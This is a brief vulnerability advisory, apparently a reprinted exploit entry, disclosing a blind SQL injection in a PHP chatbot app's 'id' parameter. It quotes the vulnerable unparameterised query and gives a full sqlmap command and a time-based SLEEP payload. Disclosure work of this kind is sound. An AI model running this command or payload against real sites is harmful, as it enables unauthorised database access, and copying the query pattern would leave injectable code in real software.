Headline
ChatBot Application With A Suggestion Feature 1.0 SQL Injection
ChatBot Application with a Suggestion Feature version 1.0 suffers from a remote blind SQL injection vulnerability.
# Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection# Date: 05/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 4 in file "/simple_chat_bot/admin/responses/view_response.php"$qry = $conn->query("SELECT * from `response_list` where id = '{$_GET['id']}' ");# Sqlmap command:sqlmap -u 'http://localhost/simple_chat_bot/admin/?id=0&page=responses/view_response' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=0' AND (SELECT 9931 FROM (SELECT(SLEEP(5)))Etug)-- bfDF&page=responses/view_responseRelated news
What We've Learned in the 12 Months Since the Colonial Pipeline Attack
The attack may have been "a major wake-up call" about the need for greater resilience in IT environments, but have security teams hit the snooze bar one too many times?